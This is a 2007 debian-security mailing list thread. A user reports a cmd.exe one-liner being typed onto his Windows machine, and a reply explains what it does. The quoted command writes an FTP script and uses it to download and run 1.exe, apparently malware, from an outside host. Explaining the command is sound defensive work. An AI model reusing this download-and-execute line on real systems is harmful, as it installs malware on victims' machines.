Re: spooky windows script

To: debian-security@lists.debian.org
Subject: Re: spooky windows script
From: Stephan Loh <loh@rommelwood.de>
Date: Tue, 8 May 2007 15:57:20 +0200
Message-id: <20070508135720.GB10205@rommel.stw.uni-erlangen.de>
In-reply-to: <20070508093959.d9ade2d5.celejar@gmail.com>
References: <3246512.31471178629044474.JavaMail.www@wwinf6103> <20070508093959.d9ade2d5.celejar@gmail.com>

hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does:

it writes the following text lines in a file called "ik":

open 59.31.153.120 22783
user db database
get 1.exe
bye

this are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppresses user autologin and verboseness
and the parameter -s:ik executes the content of the file "ik" as FTP
commands. the file ftp://db:database@59.31.153.120:22783/1.exe is being
fetched, the file "ik" is then being deleted and finally the file
"1.exe" is being executed. i suppose that 1.exe is some kind of windows
trojan or virus.

cheers,
-stephan loh
 

On 2007.05.08 15:39, Celejar wrote:
> On Tue,  8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <jan.outhuis@orange.nl> wrote:
> 
> > Hello,
> > 
> > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> > 
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> > 
> > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> > 
> > After that all is back to normal.
> > 
> > Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> > 
> > Anybody got a clue on this?
> > 
> > Tia,
> > 
> > Jan Outhuis
> 
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
> 
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
> 
> 
> -- 
> To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>

Reply to:

References:
- spooky windows script
  - From: Jan Outhuis <jan.outhuis@orange.nl>
- Re: spooky windows script
  - From: Celejar <celejar@gmail.com>

Prev by Date: Re: spooky windows script
Next by Date: Re: spooky windows script
Previous by thread: Re: spooky windows script
Next by thread: Re: spooky windows script
Index(es):
- Date
- Thread